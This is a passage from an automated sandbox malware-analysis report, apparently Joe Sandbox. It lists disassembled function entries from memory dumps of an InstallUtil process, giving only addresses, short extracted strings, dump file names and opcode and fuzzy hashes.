Opcode Fuzzy Hash: b069b6e72e0e4e868e5a3761e0ca4111e63492df92ce0e9cec1c418afbecada1
Instruction Fuzzy Hash: 3AB18C31B102198FDB54DF68C994BADBBF2BF88300F248568E459EB655DB30ED86CB50

Function 06993780 Relevance: 2.7, Strings: 2, Instructions: 239COMMON

Download Yara Rule

Strings

(bq, xrefs: 06993A5A
Hbq, xrefs: 06993AE7

Memory Dump Source

Source File: 00000001.00000002.4176899731.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6990000_InstallUtil.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: 9d49244cbc2ae9907f1bd9c260e13b8911e3a49a8040ad8653814d75be560dc8
Instruction ID: f6cc34fd8ad25f5e4aafae8d91a73502c1d973cb92164bc017c0a00093492cd1
Opcode Fuzzy Hash: 9d49244cbc2ae9907f1bd9c260e13b8911e3a49a8040ad8653814d75be560dc8
Instruction Fuzzy Hash: 83919F34704200CFDBA8EF68D49872A73A2FFC8311F158968D9068FB56CB749D46CB91

Function 06964E64 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

$^q, xrefs: 06964CBD

Memory Dump Source

Source File: 00000001.00000002.4176728675.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6960000_InstallUtil.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: 5a2925b28cc742dd8129b302de714a28bf2dc897e11a193a67577c5ac9f6a266
Instruction ID: 5e4059abcc52f81ca9c2787f3119cd466ce183d57a657f6ee081163841b11962
Opcode Fuzzy Hash: 5a2925b28cc742dd8129b302de714a28bf2dc897e11a193a67577c5ac9f6a266
Instruction Fuzzy Hash: 10B18F34A04209CFDB95DF99D994BAEB7F6FF88300F108565E506AB764DB34AC41CB90

Function 06967C77 Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

$^q, xrefs: 06967AE0

Memory Dump Source

Source File: 00000001.00000002.4176728675.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6960000_InstallUtil.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: a93650e21c1da082fe04b4473cca7b3081d24153e87819f41149a0529d000648
Instruction ID: 499305f8875f2e425da34fa3ba5fb68479afe15cf1ac03da9f3d5046e75b2d73
Opcode Fuzzy Hash: a93650e21c1da082fe04b4473cca7b3081d24153e87819f41149a0529d000648
Instruction Fuzzy Hash: 2CB16C30A04209CFDF94DF9AD584AAEB7B2FF88304F104969E516AFB64DB34AD41CB50

Function 06910D75 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176276008.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6910000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b467d248b407b9c5e9656c54a088d45abfaa84c0b4f09dcd48786f0bae939b95
Instruction ID: d9826fbc4f33e2ec4dfd7a33337b75e5bfcd6050d71248958d58530665d5ea0e
Opcode Fuzzy Hash: b467d248b407b9c5e9656c54a088d45abfaa84c0b4f09dcd48786f0bae939b95
Instruction Fuzzy Hash: BC123F34A002198FCB54DF68C988A9DB7F6FF89310F148599E54AAB355DB34EE85CF80

Function 06962B51 Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176728675.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6960000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4d99a414b7856a26eef2a0a4835b6a1b83d22cbe4ba0cac4da98c8512c2aaca
Instruction ID: 926096d1031120feddd949b9f8fe110f232c1badc6bf93fc8f11d14b057bd1ce
Opcode Fuzzy Hash: c4d99a414b7856a26eef2a0a4835b6a1b83d22cbe4ba0cac4da98c8512c2aaca
Instruction Fuzzy Hash: 28B1CC30B04201DFEBD8EB25C954B7E73A2BB88300F608969E5125FE95CB789E45DB81

Function 06980040 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176845493.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6980000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98fdfc8bc640c4e7b2f1ad5021113765541bacaf99d81115ba406c9758d90734
Instruction ID: b0e3a4cc89dc5dff18aad7ea3ec509de062c8628c37816d0880fecf18e0a8712
Opcode Fuzzy Hash: 98fdfc8bc640c4e7b2f1ad5021113765541bacaf99d81115ba406c9758d90734
Instruction Fuzzy Hash: 5CA1C230E04209CFEB98EF55C554BAEB3F3FB88301F648565D405ABA49DBB49C89CB91

Function 0698011D Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176845493.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6980000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c41b44156a1cdb6133ad35acce39bbbc76b4b86a33c019c00e0e28d84e99095
Instruction ID: c6f7997c6988fb5637ff06c83c5e1e34775e6c006347be2b73c067b378c7690e
Opcode Fuzzy Hash: 2c41b44156a1cdb6133ad35acce39bbbc76b4b86a33c019c00e0e28d84e99095
Instruction Fuzzy Hash: 3191AC30E04209CFEB98EF55C544BAEB3F3FB88301F648565D405ABA59D7B89C89CB91

Function 06980267 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176845493.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6980000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc0e6f07b2055b66bbec4c69f2cd4967b1083674ecc0b78c44e5045851784d6b
Instruction ID: 0e2106dda0e50e184c9948aa4a2c2e9e13bfaca89c94bb33174e37e4cd64c70d
Opcode Fuzzy Hash: cc0e6f07b2055b66bbec4c69f2cd4967b1083674ecc0b78c44e5045851784d6b
Instruction Fuzzy Hash: 4A91A030E04209CFEB98EF55D544BEAB3F3FB88301F648565C405ABA59D7B49C89CB91

Function 0698019D Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176845493.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6980000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4872606969866aab95351bc8519aa579f002469f060b7925e5b26b9c7afcf9a
Instruction ID: 9d7ac02a17274589fe49b4202649278d3a3a32b745552a3a2a9a5178c0b9c02d
Opcode Fuzzy Hash: a4872606969866aab95351bc8519aa579f002469f060b7925e5b26b9c7afcf9a
Instruction Fuzzy Hash: F5919F30E04209CFEB98EF55C554BAEB3F3FB88301F648565C405ABA59D7B89C89CB91

Function 06980073 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176845493.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6980000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 918de4e938ea628f7c19ae811e9424c43c4ea88770cf1b5fda49e1f4d48bac0d
Instruction ID: 11ce209345607bdb58b4111d30b072da677c65f1a675d58a1b650d3fb5df54e3
Opcode Fuzzy Hash: 918de4e938ea628f7c19ae811e9424c43c4ea88770cf1b5fda49e1f4d48bac0d
Instruction Fuzzy Hash: 2D91B130E04209CFEB98EF55C554BAEB3F3FB88301F248565C405ABA49D7B89C89CB91

Function 069800AF Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4176845493.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6980000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6789ec2fb491110b76630423570c678c7237543f26f3f009cc4f63490e2f2c50
Instruction ID: 91cff091ca0e98632b7c793d2f733f4e4d1d210c8d110fab231e1d2bc1631f63
Opcode Fuzzy Hash: 6789ec2fb491110b76630423570c678c7237543f26f3f009cc4f63490e2f2c50
Instruction Fuzzy Hash: 8B81A130E04209CFEB98EF55C554BAEB3F3FB88301F648565C405ABA59D7B49C89CB91

Function 068C18A0 Relevance: 6.4, Strings: 2, Instructions: 3868COMMON

Download Yara Rule

Strings

4'^q, xrefs: 068C4EF3
4'^q, xrefs: 068C4EFF

Memory Dump Source

Source File: 00000001.00000002.4175702285.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_68c0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 59f5b91c2c89103596d650fd14d17456fdb2ca02bf6363ffbdd207b55e86ede3
Instruction ID: ded769978290281c31a2fa47b849e4d4bd136b9d03a56e1bcb509b40d6a49897
Opcode Fuzzy Hash: 59f5b91c2c89103596d650fd14d17456fdb2ca02bf6363ffbdd207b55e86ede3
Instruction Fuzzy Hash: A953C270F106258FCFE55B68482426EBAE7AFC8660F14546EDB07E7388DE70CD858B91

Function 06998700 Relevance: 5.2, Strings: 4, Instructions: 218COMMON

Download Yara Rule

Strings

(bq, xrefs: 06998CD2
(bq, xrefs: 06998B21
(bq, xrefs: 06998AEA
(bq, xrefs: 069989E7

Memory Dump Source

Source File: 00000001.00000002.4176899731.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6990000_InstallUtil.jbxd

Similarity

API ID:
String ID: (bq$(bq$(bq$(bq
API String ID: 0-2632976689
Opcode ID: 3857feb795759bd13746c1951a089c4c18940c99e9f7bb26f1b64202be8c7f4f
Instruction ID: 88fb9fd8c7f746397f3efda73e5d213895e09d38f6c591e590989d9adfb7447d
Opcode Fuzzy Hash: 3857feb795759bd13746c1951a089c4c18940c99e9f7bb26f1b64202be8c7f4f
Instruction Fuzzy Hash: EC81AD31704215CFDB94DF29D644B6E77A3FB89300F248929D9068BB95CB74DC41CBA1

Function 00E01273 Relevance: 5.2, Strings: 4, Instructions: 155COMMON

Download Yara Rule

Strings

Te^q, xrefs: 00E012EA
Te^q, xrefs: 00E013BC
Te^q, xrefs: 00E0137D
Te^q, xrefs: 00E013D2

Memory Dump Source

Source File: 00000001.00000002.4148316883.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e00000_InstallUtil.jbxd

Similarity

API ID:
String ID: Te^q$Te^q$Te^q$Te^q
API String ID: 0-2929563283
Opcode ID: 572d2f6d3e011f033279731608db3066ceb55a822d7c75d63f9a605efbdc645a
Instruction ID: 4b2bc99951e140a7638812987489b1465141af5e76e4fe62e7d25ffdb0286d18
Opcode Fuzzy Hash: 572d2f6d3e011f033279731608db3066ceb55a822d7c75d63f9a605efbdc645a
Instruction Fuzzy Hash: 5B512E74B001058FCB48DFA8C598AAEBBF2BF88710F2544A9E406EB3A5CF749D45DB51

Function 06910040 Relevance: 3.3, Strings: 2, Instructions: 788COMMON

Download Yara Rule

Strings

$^q, xrefs: 0691037E
2, xrefs: 0691088C

Memory Dump Source

Source File: 00000001.00000002.4176276008.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6910000_InstallUtil.jbxd

Similarity

API ID:
String ID: 2$$^q
API String ID: 0-1071376767
Opcode ID: f204cb1afaecbc3cfb5d4076924c58cd70813955a4c792789679362272d48b29
Instruction ID: 1133b319343223bb5bb21c185a77534943f6ce7608882db50b71f99b352441d9
Opcode Fuzzy Hash: f204cb1afaecbc3cfb5d4076924c58cd70813955a4c792789679362272d48b29
Instruction Fuzzy Hash: A4724A34E042188FDBA5DF64D99469DBBF6FB88300F2084A9E50A9B355DB35AD85CF80

Function 0699E5A8 Relevance: 2.9, Strings: 2, Instructions: 370COMMON

Download Yara Rule

Strings

(bq, xrefs: 0699E5BC
d, xrefs: 0699E809

Memory Dump Source

Source File: 00000001.00000002.4176899731.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6990000_InstallUtil.jbxd

Similarity

API ID:
String ID: (bq$d
API String ID: 0-3334038649
Opcode ID: 6b7b28b48ffa452d59a1aa2798903b0226eb4677e4d82ac6d84a320e9fbd206e
Instruction ID: 59a5fd8206c8f54062eaaaf5ec90bcf54d11081e6d09f6ab89ad52d036b036ba
Opcode Fuzzy Hash: 6b7b28b48ffa452d59a1aa2798903b0226eb4677e4d82ac6d84a320e9fbd206e
Instruction Fuzzy Hash: 5CE18A34700602CFCB54CF29C48096AB7F6FF88314B258969E45A9BB65DB30FC46CBA1

Function 056CAB60 Relevance: 2.8, Strings: 2, Instructions: 336COMMON

Download Yara Rule

Strings

$^q, xrefs: 056CAEEC
$^q, xrefs: 056CAF90

Memory Dump Source

Source File: 00000001.00000002.4171155113.00000000056C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_56c0000_InstallUtil.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: f43181879b6bc3c3aa77a57c0a5458f95607b67a14a72e8d7cc8c45b35a7196a
Instruction ID: 590f4a169ffaea4a59b1ef9534af27ad66130a87731d70c9b4f107ffc4517b4e
Opcode Fuzzy Hash: f43181879b6bc3c3aa77a57c0a5458f95607b67a14a72e8d7cc8c45b35a7196a
Instruction Fuzzy Hash: B1E15B74A01209CFCB15EFA8D5959BEBBF2FF88300F108569E416AB365DB34AD05CB90

Function 068C71D0 Relevance: 2.7, Strings: 2, Instructions: 244COMMON

Download Yara Rule

Strings

4'^q, xrefs: 068C74C8
4'^q, xrefs: 068C74D4

Memory Dump Source

Source File: 00000001.00000002.4175702285.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_68c0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: f83866548a4b444ad717330bf138a6fee096bc9183f6f2032fe54b9dbe1cff7f
Instruction ID: 9126eec4e669ffe9e30f118c099417296c3ae43f528c2bb2c9b241b574141b15
Opcode Fuzzy Hash: f83866548a4b444ad717330bf138a6fee096bc9183f6f2032fe54b9dbe1cff7f
Instruction Fuzzy Hash: BD71B131F006258B4EF6A639463013EAA979BC6670704451DDF17DB388EF35CC0A4BD2

Function 06993771 Relevance: 2.7, Strings: 2, Instructions: 216COMMON

Download Yara Rule

Strings

(bq, xrefs: 06993A5A
Hbq, xrefs: 06993AE7

Memory Dump Source

Source File: 00000001.00000002.4176899731.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6990000_InstallUtil.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: 902af31493eca3f66f414856e1ee75de7b671c020eb146865d92289eb7125d39
Instruction ID: 994dc50d73e33670a23c227b69fee4724177c120f241786a4e7cc2be2f865851
Opcode Fuzzy Hash: 902af31493eca3f66f414856e1ee75de7b671c020eb146865d92289eb7125d39
Instruction Fuzzy Hash: 7A81B134704200CFDBA9EF68D498B2A77A2FFC8311F108569D9068FB56CB749D45CBA1

Function 0696B6F0 Relevance: 2.7, Strings: 2, Instructions: 154COMMON

Download Yara Rule

Strings

(bq, xrefs: 0696BB23
Hbq, xrefs: 0696BA60

Memory Dump Source

Source File: 00000001.00000002.4176728675.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6960000_InstallUtil.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: acc8835be9fe56eee3f22a9dac9c906d4b052708a723f267afa7a1434d199d77
Instruction ID: 8760de91ad97c439250c009aeb0eaaa3e797cc6efdcf4474c005dd926f6bb1e3
Opcode Fuzzy Hash: acc8835be9fe56eee3f22a9dac9c906d4b052708a723f267afa7a1434d199d77
Instruction Fuzzy Hash: 1D51D631A04316CFDB94CF6AD490269F7A6FB84314F248676E519C7E4AE371E862CBC0

Function 06964C11 Relevance: 2.6, Strings: 2, Instructions: 131COMMON

Download Yara Rule

Strings

$^q, xrefs: 06964C4E
$^q, xrefs: 06964CBD

Memory Dump Source

Source File: 00000001.00000002.4176728675.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6960000_InstallUtil.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 112d026ada0e108f96f7df4db87a22d64b0dc2606ce638d9ca7fc01650bd51d8
Instruction ID: 386fa94ddc5045288a55760fff11dbcc7e26942178707eba126b46313d2a82e0
Opcode Fuzzy Hash: 112d026ada0e108f96f7df4db87a22d64b0dc2606ce638d9ca7fc01650bd51d8
Instruction Fuzzy Hash: 3B51F474E04609CFDB94DF99D994AEDBBF2BF48300F1085AAE002AB764DB74A944DB50

Function 06990730 Relevance: 2.6, Strings: 2, Instructions: 125COMMON

Download Yara Rule

Strings

$^q, xrefs: 06990755
$^q, xrefs: 06990745

Memory Dump Source

Source File: 00000001.00000002.4176899731.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6990000_InstallUtil.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 77a7027c3aee3ca0a4b36b0f668be510c91f8f96a26c8d22186b9b45530261aa
Instruction ID: 603af2611ef8f73e204d94568b8f2e5db54c1b3fa6704b5ad727e5a63143e483
Opcode Fuzzy Hash: 77a7027c3aee3ca0a4b36b0f668be510c91f8f96a26c8d22186b9b45530261aa
Instruction Fuzzy Hash: EC512934E00208CFEFA8DF58C984BAA77B6BF88310F248599D5169BB55CB319D85CF61

Function 068C4F90 Relevance: 2.6, Strings: 2, Instructions: 120COMMON

Download Yara Rule

Strings

4'^q, xrefs: 068C50F7
4'^q, xrefs: 068C50EB

Memory Dump Source

Source File: 00000001.00000002.4175702285.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_68c0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: ed64f96cdb2c72a38403da269394d792a00adc7a11515bb4129d9555d7a70b3b
Instruction ID: aeab23e597b0dde1ee02aebe1f0ba4ac976ae34f231d9ae88bdd54e13a139edd
Opcode Fuzzy Hash: ed64f96cdb2c72a38403da269394d792a00adc7a11515bb4129d9555d7a70b3b
Instruction Fuzzy Hash: B431BD35F502288F8FAA6625556813E3297BFC46BAB14551DEA07D7380CF31ED468BC3

Function 06967A51 Relevance: 2.6, Strings: 2, Instructions: 117COMMON

Download Yara Rule

Strings

$^q, xrefs: 06967AE0
$^q, xrefs: 06967A71

Memory Dump Source

Source File: 00000001.00000002.4176728675.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6960000_InstallUtil.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 1567bef33e107c41f795de70c1b2eb08ddfc331dcbddce938013acc623d12b07
Instruction ID: 75a3ecf8a90f1507a30ff0bb2bafe936d26ea62f4137e03cc3fc1ce8d5b62419
Opcode Fuzzy Hash: 1567bef33e107c41f795de70c1b2eb08ddfc331dcbddce938013acc623d12b07
Instruction Fuzzy Hash: 9451E770D00209CFDB58DFD9D984AEDBBF2FF88314F104969E111AB664D7349945CB50

Function 069458F0 Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

Deq, xrefs: 0694598B

Memory Dump Source

Source File: 00000001.00000002.4176492111.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6940000_InstallUtil.jbxd

Similarity

API ID:
String ID: Deq
API String ID: 0-948982800
Opcode ID: 1c9e9533e9ccb4afba5ab441b40e6ee0c1a920c38087309f4b092428a6823240
Instruction ID: 74e043498b799e557b65cab42b3e4878824d6d4ebd7adf69748a464c26d112d7
Opcode Fuzzy Hash: 1c9e9533e9ccb4afba5ab441b40e6ee0c1a920c38087309f4b092428a6823240
Instruction Fuzzy Hash: 8EB1CF31A006049FCB58EF69D994E5ABBF6FF88310F258569E445DB3A5DB30EC41CBA0

Function 00E01830 Relevance: 1.5, Strings: 1, Instructions: 251COMMON

Download Yara Rule

Strings

Deq, xrefs: 00E018BF

Memory Dump Source

Source File: 00000001.00000002.4148316883.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e00000_InstallUtil.jbxd

Similarity

API ID:
String ID: Deq
API String ID: 0-948982800
Opcode ID: 8d62f8b203657bf958fb9c4a45ab4750bac45490db1f52f0fc1adf3064901041
Instruction ID: 00d83661e0f321ba2ef24f011195adbcf0571ed57031ba9c8a8335de9eb6acf2
Opcode Fuzzy Hash: 8d62f8b203657bf958fb9c4a45ab4750bac45490db1f52f0fc1adf3064901041
Instruction Fuzzy Hash: B4A1BE34A006008FCB15EF69D594A9EBBF2FF88310F1185A9E405AB3A5DB71EC41CF91

Function 069130C5 Relevance: 1.5, Strings: 1, Instructions: 219COMMON

Download Yara Rule

Strings

TJcq, xrefs: 069130DB

Memory Dump Source

Source File: 00000001.00000002.4176276008.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6910000_InstallUtil.jbxd

Similarity

API ID:
String ID: TJcq
API String ID: 0-1911830065
Opcode ID: 77b4661176f3478c8e22f7c1a8406fd68ff72d726ae5727f4d88f2f2f739803c
Instruction ID: 907f309506aca13e079e4a87693b6aaf5968cb21e1d6c50c0ced50c34691cf33
Opcode Fuzzy Hash: 77b4661176f3478c8e22f7c1a8406fd68ff72d726ae5727f4d88f2f2f739803c
Instruction Fuzzy Hash: BA919534A08609CFD795EF68D58466DB7B2FB88300F208925E4169F745CB349E86DBD1

Function 06902870 Relevance: 1.4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

,bq, xrefs: 06902CE1

Memory Dump Source

Source File: 00000001.00000002.4176148303.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6900000_InstallUtil.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: bb7bdb272cb9a9f26e56aad83ba7174979cf9691b3f90664e832c1a5b8491b7e
Instruction ID: 54352fe881672c40554a325caafebd9d759ebcaa45565b246582d577f83ba30c
Opcode Fuzzy Hash: bb7bdb272cb9a9f26e56aad83ba7174979cf9691b3f90664e832c1a5b8491b7e
Instruction Fuzzy Hash: F9812975904228CFEBA5DF14C988BEDBBB2FB49300F2444D6D549AB691CB319E85CF50

Function 06945630 Relevance: 1.4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

Strings

pbq, xrefs: 069456BF

Memory Dump Source

Source File: 00000001.00000002.4176492111.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6940000_InstallUtil.jbxd

Similarity

API ID:
String ID: pbq
API String ID: 0-3896149868
Opcode ID: e1c4fffae7234b0aeb69e38d15ab6d1a196f94c0815bf7f56865c75aa9abbfcc
Instruction ID: dd5f41f9cd8fadb3d6dc88809aedcb3d7632771976f6d6635df30e85cc5ddb26
Opcode Fuzzy Hash: e1c4fffae7234b0aeb69e38d15ab6d1a196f94c0815bf7f56865c75aa9abbfcc
Instruction Fuzzy Hash: 32619F35600100DFDB89EF98D958D6A7BB3FF8C310B1684A8E2069B676CB35DD52DB50

Function 00E01820 Relevance: 1.4, Strings: 1, Instructions: 170COMMON

Download Yara Rule

Strings

Deq, xrefs: 00E018BF

Memory Dump Source

Source File: 00000001.00000002.4148316883.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e00000_InstallUtil.jbxd

Similarity

API ID:
String ID: Deq
API String ID: 0-948982800
Opcode ID: 32dd4f0a0eba0d426d585c15c4ec9fbdfbecec397d806be018f7ceb4abb1fbd9
Instruction ID: ac52a660d4a11579c07a256fecac6d8db4c75ea47ce3ad9fadfcb5fabd7604ea
Opcode Fuzzy Hash: 32dd4f0a0eba0d426d585c15c4ec9fbdfbecec397d806be018f7ceb4abb1fbd9
Instruction Fuzzy Hash: BD619E79600A008FCB15EF69D594A99BBF2FF88314B1581A9E406EB3B5DB70EC41CF91

Function 06945640 Relevance: 1.4, Strings: 1, Instructions: 170COMMON

Download Yara Rule

Strings

pbq, xrefs: 069456BF

Memory Dump Source

Source File: 00000001.00000002.4176492111.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6940000_InstallUtil.jbxd

Similarity

API ID:
String ID: pbq
API String ID: 0-3896149868
Opcode ID: 224260a3c3607bd023b60b27e8f694400141bf46a48cb7eaef801aae328bed1c
Instruction ID: 07ac4c83ca7d54b704c4e6a42d649eb76c6ac0c26797c36b5e6dc25e85cee702
Opcode Fuzzy Hash: 224260a3c3607bd023b60b27e8f694400141bf46a48cb7eaef801aae328bed1c
Instruction Fuzzy Hash: AA619F35600100DFDB89EF98D958E6A7BB3FF8C310B1684A8E2059B676CB35DD62DB50

Function 0690AB40 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0690AC7C

Memory Dump Source

Source File: 00000001.00000002.4176148303.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6900000_InstallUtil.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 7a73e6160c01ce8a0629d47377385d7559e906ab7af838727bd24ff694975b75
Instruction ID: ea971606225bff86d34195190de1f919971b164f0f43f0dabb4fd42a109a6e7e
Opcode Fuzzy Hash: 7a73e6160c01ce8a0629d47377385d7559e906ab7af838727bd24ff694975b75
Instruction Fuzzy Hash: 0B518F30B442049FE788EB38D994B6A77A7BFC9300F244869D516CFBA6CB71AC41C791

Function 0694A2C8 Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

(bq, xrefs: 0694A33C

Memory Dump Source

Source File: 00000001.00000002.4176492111.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6940000_InstallUtil.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: bf8c4e42b8572dd79032015d85ba834cfdb4e7a0bb5ec2ca99623558fa72a48e
Instruction ID: 37a6d50897ebe3acd0261f6595ddc1943661dca5c98e863e0ffcac8636d20bd7
Opcode Fuzzy Hash: bf8c4e42b8572dd79032015d85ba834cfdb4e7a0bb5ec2ca99623558fa72a48e
Instruction Fuzzy Hash: 2451C131B042168FCB00DF58D484A6EFBB5FF85320B2586A6E5559B646D730FC55CBD0

Function 0690AB31 Relevance: 1.4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0690AC7C

Memory Dump Source

Source File: 00000001.00000002.4176148303.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6900000_InstallUtil.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: b0c343c33819119a2750699d7711ece95574e24753fd1ae4ff55bd4afd666902
Instruction ID: 029ffb5cf5684d25d24bac7e2c9142dc1935a1d9fda3f37c3583f31ae50395fa
